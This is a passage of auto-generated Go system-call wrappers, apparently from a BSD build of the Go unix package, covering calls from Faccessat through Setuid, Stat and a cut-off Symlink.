THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Faccessat(dirfd int, path string, mode uint32, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FACCESSAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchdir(fd int) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHDIR, uintptr(fd), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchflags(fd int, flags int) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHFLAGS, uintptr(fd), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchmod(fd int, mode uint32) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHMOD, uintptr(fd), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchmodat(dirfd int, path string, mode uint32, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FCHMODAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchown(fd int, uid int, gid int) (err error) {\n\t_, _, e1 := Syscall(SYS_FCHOWN, uintptr(fd), uintptr(uid), uintptr(gid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fchownat(dirfd int, path string, uid int, gid int, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FCHOWNAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(uid), uintptr(gid), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Flock(fd int, how int) (err error) {\n\t_, _, e1 := Syscall(SYS_FLOCK, uintptr(fd), uintptr(how), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fpathconf(fd int, name int) (val int, err error) {\n\tr0, _, e1 := Syscall(SYS_FPATHCONF, uintptr(fd), uintptr(name), 0)\n\tval = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fstat(fd int, stat *Stat_t) (err error) {\n\t_, _, e1 := Syscall(SYS_FSTAT, uintptr(fd), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fstatat(fd int, path string, stat *Stat_t, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_FSTATAT, uintptr(fd), uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), uintptr(flags), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fstatfs(fd int, stat *Statfs_t) (err error) {\n\t_, _, e1 := Syscall(SYS_FSTATFS, uintptr(fd), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Fsync(fd int) (err error) {\n\t_, _, e1 := Syscall(SYS_FSYNC, uintptr(fd), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Ftruncate(fd int, length int64) (err error) {\n\t_, _, e1 := Syscall(SYS_FTRUNCATE, uintptr(fd), uintptr(length), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getdents(fd int, buf []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_GETDENTS, uintptr(fd), uintptr(_p0), uintptr(len(buf)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getdirentries(fd int, buf []byte, basep *uintptr) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p0 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_GETDIRENTRIES, uintptr(fd), uintptr(_p0), uintptr(len(buf)), uintptr(unsafe.Pointer(basep)), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getdtablesize() (size int) {\n\tr0, _, _ := Syscall(SYS_GETDTABLESIZE, 0, 0, 0)\n\tsize = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getegid() (egid int) {\n\tr0, _, _ := RawSyscall(SYS_GETEGID, 0, 0, 0)\n\tegid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Geteuid() (uid int) {\n\tr0, _, _ := RawSyscall(SYS_GETEUID, 0, 0, 0)\n\tuid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getgid() (gid int) {\n\tr0, _, _ := RawSyscall(SYS_GETGID, 0, 0, 0)\n\tgid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpgid(pid int) (pgid int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_GETPGID, uintptr(pid), 0, 0)\n\tpgid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpgrp() (pgrp int) {\n\tr0, _, _ := RawSyscall(SYS_GETPGRP, 0, 0, 0)\n\tpgrp = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpid() (pid int) {\n\tr0, _, _ := RawSyscall(SYS_GETPID, 0, 0, 0)\n\tpid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getppid() (ppid int) {\n\tr0, _, _ := RawSyscall(SYS_GETPPID, 0, 0, 0)\n\tppid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getpriority(which int, who int) (prio int, err error) {\n\tr0, _, e1 := Syscall(SYS_GETPRIORITY, uintptr(which), uintptr(who), 0)\n\tprio = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getrlimit(which int, lim *Rlimit) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETRLIMIT, uintptr(which), uintptr(unsafe.Pointer(lim)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getrusage(who int, rusage *Rusage) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETRUSAGE, uintptr(who), uintptr(unsafe.Pointer(rusage)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getsid(pid int) (sid int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_GETSID, uintptr(pid), 0, 0)\n\tsid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Gettimeofday(tv *Timeval) (err error) {\n\t_, _, e1 := RawSyscall(SYS_GETTIMEOFDAY, uintptr(unsafe.Pointer(tv)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Getuid() (uid int) {\n\tr0, _, _ := RawSyscall(SYS_GETUID, 0, 0, 0)\n\tuid = int(r0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Issetugid() (tainted bool) {\n\tr0, _, _ := Syscall(SYS_ISSETUGID, 0, 0, 0)\n\ttainted = bool(r0 != 0)\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Kill(pid int, signum syscall.Signal) (err error) {\n\t_, _, e1 := Syscall(SYS_KILL, uintptr(pid), uintptr(signum), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Kqueue() (fd int, err error) {\n\tr0, _, e1 := Syscall(SYS_KQUEUE, 0, 0, 0)\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Lchown(path string, uid int, gid int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_LCHOWN, uintptr(unsafe.Pointer(_p0)), uintptr(uid), uintptr(gid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Link(path string, link string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_LINK, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Linkat(pathfd int, path string, linkfd int, link string, flags int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(link)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_LINKAT, uintptr(pathfd), uintptr(unsafe.Pointer(_p0)), uintptr(linkfd), uintptr(unsafe.Pointer(_p1)), uintptr(flags), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Listen(s int, backlog int) (err error) {\n\t_, _, e1 := Syscall(SYS_LISTEN, uintptr(s), uintptr(backlog), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Lstat(path string, stat *Stat_t) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_LSTAT, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mkdir(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKDIR, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mkdirat(dirfd int, path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKDIRAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(mode))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mkfifo(path string, mode uint32) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKFIFO, uintptr(unsafe.Pointer(_p0)), uintptr(mode), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Mknod(path string, mode uint32, dev int) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_MKNOD, uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(dev))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Nanosleep(time *Timespec, leftover *Timespec) (err error) {\n\t_, _, e1 := Syscall(SYS_NANOSLEEP, uintptr(unsafe.Pointer(time)), uintptr(unsafe.Pointer(leftover)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Open(path string, mode int, perm uint32) (fd int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall(SYS_OPEN, uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(perm))\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Openat(fdat int, path string, mode int, perm uint32) (fd int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall6(SYS_OPENAT, uintptr(fdat), uintptr(unsafe.Pointer(_p0)), uintptr(mode), uintptr(perm), 0, 0)\n\tfd = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Pathconf(path string, name int) (val int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tr0, _, e1 := Syscall(SYS_PATHCONF, uintptr(unsafe.Pointer(_p0)), uintptr(name), 0)\n\tval = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Pread(fd int, p []byte, offset int64) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_PREAD, uintptr(fd), uintptr(_p0), uintptr(len(p)), uintptr(offset), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Pwrite(fd int, p []byte, offset int64) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_PWRITE, uintptr(fd), uintptr(_p0), uintptr(len(p)), uintptr(offset), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc read(fd int, p []byte) (n int, err error) {\n\tvar _p0 unsafe.Pointer\n\tif len(p) > 0 {\n\t\t_p0 = unsafe.Pointer(&p[0])\n\t} else {\n\t\t_p0 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_READ, uintptr(fd), uintptr(_p0), uintptr(len(p)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Readlink(path string, buf []byte) (n int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p1 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p1 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall(SYS_READLINK, uintptr(unsafe.Pointer(_p0)), uintptr(_p1), uintptr(len(buf)))\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Readlinkat(dirfd int, path string, buf []byte) (n int, err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 unsafe.Pointer\n\tif len(buf) > 0 {\n\t\t_p1 = unsafe.Pointer(&buf[0])\n\t} else {\n\t\t_p1 = unsafe.Pointer(&_zero)\n\t}\n\tr0, _, e1 := Syscall6(SYS_READLINKAT, uintptr(dirfd), uintptr(unsafe.Pointer(_p0)), uintptr(_p1), uintptr(len(buf)), 0, 0)\n\tn = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Rename(from string, to string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(from)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(to)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_RENAME, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(_p1)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Renameat(fromfd int, from string, tofd int, to string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(from)\n\tif err != nil {\n\t\treturn\n\t}\n\tvar _p1 *byte\n\t_p1, err = BytePtrFromString(to)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall6(SYS_RENAMEAT, uintptr(fromfd), uintptr(unsafe.Pointer(_p0)), uintptr(tofd), uintptr(unsafe.Pointer(_p1)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Revoke(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_REVOKE, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Rmdir(path string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_RMDIR, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Seek(fd int, offset int64, whence int) (newoffset int64, err error) {\n\tr0, _, e1 := Syscall(SYS_LSEEK, uintptr(fd), uintptr(offset), uintptr(whence))\n\tnewoffset = int64(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Select(n int, r *FdSet, w *FdSet, e *FdSet, timeout *Timeval) (err error) {\n\t_, _, e1 := Syscall6(SYS_SELECT, uintptr(n), uintptr(unsafe.Pointer(r)), uintptr(unsafe.Pointer(w)), uintptr(unsafe.Pointer(e)), uintptr(unsafe.Pointer(timeout)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setegid(egid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETEGID, uintptr(egid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Seteuid(euid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETEUID, uintptr(euid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setgid(gid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETGID, uintptr(gid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setlogin(name string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(name)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_SETLOGIN, uintptr(unsafe.Pointer(_p0)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setpgid(pid int, pgid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETPGID, uintptr(pid), uintptr(pgid), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setpriority(which int, who int, prio int) (err error) {\n\t_, _, e1 := Syscall(SYS_SETPRIORITY, uintptr(which), uintptr(who), uintptr(prio))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setregid(rgid int, egid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETREGID, uintptr(rgid), uintptr(egid), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setreuid(ruid int, euid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETREUID, uintptr(ruid), uintptr(euid), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setresgid(rgid int, egid int, sgid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETRESGID, uintptr(rgid), uintptr(egid), uintptr(sgid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setresuid(ruid int, euid int, suid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETRESUID, uintptr(ruid), uintptr(euid), uintptr(suid))\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setrlimit(which int, lim *Rlimit) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETRLIMIT, uintptr(which), uintptr(unsafe.Pointer(lim)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setsid() (pid int, err error) {\n\tr0, _, e1 := RawSyscall(SYS_SETSID, 0, 0, 0)\n\tpid = int(r0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Settimeofday(tp *Timeval) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETTIMEOFDAY, uintptr(unsafe.Pointer(tp)), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Setuid(uid int) (err error) {\n\t_, _, e1 := RawSyscall(SYS_SETUID, uintptr(uid), 0, 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Stat(path string, stat *Stat_t) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_STAT, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Statfs(path string, stat *Statfs_t) (err error) {\n\tvar _p0 *byte\n\t_p0, err = BytePtrFromString(path)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, _, e1 := Syscall(SYS_STATFS, uintptr(unsafe.Pointer(_p0)), uintptr(unsafe.Pointer(stat)), 0)\n\tif e1 != 0 {\n\t\terr = errnoErr(e1)\n\t}\n\treturn\n}\n\n// THIS FILE IS GENERATED BY THE COMMAND AT THE TOP; DO NOT EDIT\n\nfunc Symlink(path string, link string) (err error) {\n\tvar _p0 *byte\n\t_p0, err = 